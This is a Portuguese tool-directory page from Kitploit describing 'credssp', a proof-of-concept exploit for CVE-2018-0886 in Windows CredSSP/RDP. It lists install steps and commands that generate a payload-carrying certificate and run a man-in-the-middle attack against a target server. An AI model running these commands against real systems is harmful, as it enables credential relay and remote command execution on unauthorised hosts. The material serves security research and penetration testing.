Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
credssp — A code demonstrating CVE-2018-0886 | Kitploit
Ferramentas/GitHubGitHub/preempt/credssp
Vulnerability AnalysisExploitationLateral MovementPenetration TestingLearning & EducationRed Teaming
GitHubpreempt/credssp

credssp

A code demonstrating CVE-2018-0886

Ver Repositório
26757há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

credssp

Este é um código de prova de conceito para explorar a CVE-2018-0886. Deve ser usado apenas para fins educacionais. Ele depende de um fork do projeto rdpy (https://github.com/preempt/rdpy), permitindo também relay credssp.

Escrito por Eyal Karni, Preempt [email protected]

Construção

Instruções (Linux)

Se você estiver usando Ubuntu 14, verifique o arquivo de instalação.. Foi testado no Ubuntu 16.04.

root@kitploit:~
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git 
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
  • Assume-se um estado inicial bastante limpo. O melhor é desinstalar primeiro componentes relevantes como cryptography, pyopenssl talvez (pip uninstall cryptography).
  • Uma versão diferente do openssl precisou ser instalada para que isso funcionasse corretamente. O script de instalação faz isso.
  • Por favor, siga as instruções na ordem descrita.

Executando o exploit

Exporte um certificado adequado para Autenticação de Servidor de qualquer domínio. (É usado para RDP https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))

Para gerar um certificado que explora a vulnerabilidade(contém o payload), use:

root@kitploit:~
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD 

(ExportedCert é o certificado exportado do passo 1. exploitc.pem ,exploitk.pem são o certificado gerado e a chave privada, respectivamente)

Para executar o script de ataque:

root@kitploit:~
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer

Mais detalhes estão na seção de uso dos scripts (--help).

Baixar ferramenta